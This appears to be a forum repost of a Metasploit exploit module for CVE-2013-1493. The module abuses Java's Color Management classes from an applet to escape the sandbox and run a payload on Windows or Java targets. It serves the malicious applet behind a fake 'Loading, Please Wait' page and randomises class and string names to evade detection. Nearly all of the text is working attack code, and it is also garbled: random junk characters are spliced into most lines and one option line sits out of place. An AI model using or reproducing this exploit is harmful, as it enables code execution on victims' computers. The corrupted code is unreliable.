##
9 B% n+ M$ M8 J; K% _7 P5 C! z0 L$ w
# This file is part of the Metasploit Framework and may be subject to8 z" F: g9 n: O3 V
# redistribution and commercial restrictions. Please see the Metasploit0 e- H7 F5 z$ y! v9 q+ ?
# web site for more information on licensing and terms of use.
% B4 p. P5 S0 C4 ~ a F* H1 b# http://metasploit.com/
d* K' \( x, }! p##
8 M5 u8 T0 K/ R: _, ]( Urequire ‘msf/core’
& g7 n1 Q5 P }# U" [) z( qrequire ‘rex’7 D O/ Q# M9 z9 d; H- d* E4 [3 C
class Metasploit3 < Msf::Exploit::Remote
. `, Z" r0 n* L0 r5 M( ?6 yRank = NormalRanking
2 ?- w( C0 o& S7 V' S5 [include Msf::Exploit::Remote::HttpServer::HTML, s1 i# Q' \. l$ n2 v( c
include Msf::Exploit::EXE
2 v1 W& n l5 d$ z! t4 Qinclude Msf::Exploit::Remote::BrowserAutopwn" L$ U" _- I: X4 {8 N. ~# y
autopwn_info({ :javascript => false })8 ]5 [, L' r7 ^5 I( n7 u! C- r
def initialize( info = {} )3 u- O, @/ E6 I0 v( Z
super( update_info( info,
* |* W: U& d2 h( m$ \* l6 P+ b‘Name’ => ‘Java CMM Remote Code Execution’,
2 e2 y5 L3 c( x( t‘Description’ => %q{9 i3 b* U* x+ T& K
This module abuses the Color Management classes from a Java Applet to run' K% D' i. H& d. [$ U3 v' s/ D5 k
arbitrary Java code outside of the sandbox as exploited in the wild in February
$ A5 P/ g U+ Wand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
`, i* f7 C+ L( Oand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP15 o4 c1 e8 o7 @$ [. K4 _6 R& z
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* o5 O0 Y8 d4 g$ @8 I3 R wwarning in order to run the malicious applet.8 T1 w% D0 k; D1 h! Z6 r1 \& W- l
},* y# X( I8 }& Q G
‘License’ => MSF_LICENSE, C! s8 s0 S- W* C5 X
‘Author’ =>& T/ I% s/ J: z
'Unknown', # Vulnerability discovery and Exploit
& s$ c1 C* c# k* I) ?'juan vazquez' # Metasploit module (just ported the published exploit)
& D; p' e9 p5 b],
3 d7 F8 M. |1 H‘References’ =>
' Y r7 Q3 J( I: g1 e[
8 S( v& n9 d( y/ l, E/ y[ 'CVE', '2013-1493' ],
5 z' u9 M& ~2 o. `[ 'OSVDB', '90737' ],0 ?1 w7 o9 w& k1 p
[ 'BID', '58238' ],
* E3 ~$ E1 r% D7 K+ }; c[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
1 I6 x( P K2 {8 [% V0 M[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],4 C' I( V% T- p9 B
[ 'URL', 'http://pastie.org/pastes/6581034' ], {* a4 {7 x6 K0 _
],
. l9 F. u1 G- u& \( R7 U: X$ p( A‘Platform’ => [ 'win', 'java' ],
3 a4 Z; M% }, {$ B, X5 E‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },) Z; \3 c# k; _# F( [. M) d
‘Targets’ =>2 \# t) l" D# N a; A7 w8 i& C
[6 U0 ^0 v% }% _: S9 w* y
[ 'Generic (Java Payload)',( q7 F: B) N. P
{
7 x3 ?# v$ @; t( C) y'Platform' => 'java',
: L m* g. [7 w* S. L7 D0 _- p'Arch' => ARCH_JAVA9 ~' B% C5 B4 _2 j) |4 e% `
}
5 W8 D3 C9 `. R5 @; y# _) w],- g, k6 e8 i( n i( b
[ 'Windows x86 (Native Payload)',+ B8 n& R7 T; _ t/ a% P+ j
{6 g" P1 ~/ w; Q7 T+ k
'Platform' => 'win',8 v( Z3 y9 ~2 n& }( t( S
'Arch' => ARCH_X86
2 I) N: s4 D2 }& Z: \" W, L2 A" q: }}
$ b* q/ d( r6 D9 ?+ ^" Y1 n6 _]
0 ~+ H# n# {6 z],' e, |8 W* j; N
‘‘DisclosureDate’ => ‘Mar 01 2013′
# @5 n* O' \, K& F6 Q4 L; y))
$ g* p4 G1 s. X9 A1 Z- Cend% C" Z3 _1 M0 v/ F1 v
def setup
' O4 e9 Q- |1 w$ c5 G3 X3 hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)% q( o% F4 A( M; R; Q" p E
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
B$ P! j# ]3 x- v) u) `path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
0 {1 ?5 e1 z q7 V0 \5 j@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) F3 g: m( q; o0 q$ K6 j; e" h* Z5 F/ hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
) [) r8 x% |+ p' P@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& B" h8 a! G3 ?2 _% p
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”) Z$ ?; v6 [+ ]
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }1 S8 F% @+ e) U0 C; Y! }
@init_class_name = rand_text_alpha(“Init”.length)5 s5 c" [3 f, i' l( Y% i6 ]0 V0 j8 |
@init_class.gsub!(“Init”, @init_class_name)
( x3 A# ~$ e$ a9 Csuper7 t5 `9 [! k& e6 x+ [
end" h8 a/ c/ z( c) v* R9 z0 W) t
def on_request_uri(cli, request)
+ Q- y- w1 \* o3 H8 y- n3 Oprint_status(“handling request for #{request.uri}”); |% ]* h4 K) A+ p( s# ]1 c
case request.uri, Y$ T- W: ]- u8 p3 Z; Z4 r
when /\.jar$/i
3 {) ~- K4 F# m7 Wjar = payload.encoded_jar5 r$ L% f3 A* ]6 `1 E" g" J* J' }
jar.add_file(“#{@init_class_name}.class”, @init_class)! W& g6 s4 f8 V4 c0 N
jar.add_file(“Leak.class”, @leak_class)
) S7 \9 n. X$ c9 K1 Y/ f4 _jar.add_file(“MyBufferedImage.class”, @buffered_image_class)! h, Y' P6 n9 D7 U7 C4 {4 A9 A
jar.add_file(“MyColorSpace.class”, @color_space_class)3 G& T7 S! h+ l# _/ Z- U
DefaultTarget’ => 1,0 P5 D6 r" z* i; Z
metasploit_str = rand_text_alpha(“metasploit”.length)
; B/ D5 b0 u+ l* z8 `payload_str = rand_text_alpha(“payload”.length)
% i. j4 x( @) Bjar.entries.each { |entry|) T& b4 ]8 R& ]( q9 Q+ e- {& Y
entry.name.gsub!(“metasploit”, metasploit_str)! S3 g* T4 S0 e* N1 C# T+ D/ F
entry.name.gsub!(“Payload”, payload_str)
1 U/ v3 e: y0 I. P/ mentry.data = entry.data.gsub(“metasploit”, metasploit_str)4 s" c) w; U2 J' l, l7 _, y' P8 ^
entry.data = entry.data.gsub(“Payload”, payload_str)
/ T- Q8 ^" G6 ?% C8 w}
1 F5 k1 ]4 x4 B4 Z! Jjar.build_manifest6 Z# G$ M+ B6 a% i+ c7 Y5 D5 l
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
. R, G4 u# I' P* `3 u+ R# C3 c& C' ewhen /\/$/* G3 m* L0 r; S/ }8 K8 R$ c
payload = regenerate_payload(cli)
; m4 i8 e7 X9 g( y6 j; a% `" bif not payload
8 {: c: _) p2 x% J, ?print_error(“Failed to generate the payload.”)
( _8 H3 r& Y/ K5 R" m5 e4 nsend_not_found(cli)
6 t# D' p- S* l0 p. H; Treturn8 y4 e1 P0 c: [
end
/ ]; O8 |9 m% I6 M% g( H2 Msend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
% `( G5 @* H U: N0 u; `9 u5 delse
0 |9 X: m5 s) r- ysend_redirect(cli, get_resource() + ‘/’, ”). R; `9 e* m% S9 V+ A$ o
end# w; u+ N. p4 ?. o# i) _4 }
end0 @3 v) B8 C: _1 }
def generate_html
6 s1 T' {4 ~6 _0 Ghtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|2 \% E! k5 }* i" i' z1 U3 J } i
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
; ^* }( N7 x+ jhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|3 m" H$ [ U/ K
html += %Q|</applet></body></html>|4 t: @( ?8 b' w, i5 _
return html
: s+ V S3 f% B9 H5 D/ [! Tend
' L" }- I1 j" H* J; w8 o& G6 Wend
H5 o7 v( S( yend P4 ?0 ]+ X/ k* z8 k, Z" Z4 a6 l- A
|
发表于 2013-4-4 17:31:17
收藏
支持
反对